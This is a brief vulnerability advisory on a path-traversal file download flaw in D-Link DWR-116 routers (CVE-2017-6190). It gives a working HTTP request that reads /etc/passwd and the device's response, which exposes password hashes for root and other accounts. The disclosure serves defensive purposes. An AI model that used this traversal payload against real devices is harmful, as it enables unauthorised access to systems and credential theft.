D-Link DWR-116 is prone to an arbitrary-file-download vulnerability.
An attacker can exploit this issue to download arbitrary files from the device filesystem and obtain potentially sensitive information.
Information
D-Link DWR-116 1.01(EU)
D-Link DWR-116 1.00(CP)b10
Exploit
Attackers can use a browser to exploit these issues.
The following example request is available:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
References:
- D-Link Homepage (D-Link)
- D-Link DWR-116 - CVE-2017-6190 - Arbitrary File Download (Patryk Bogdan)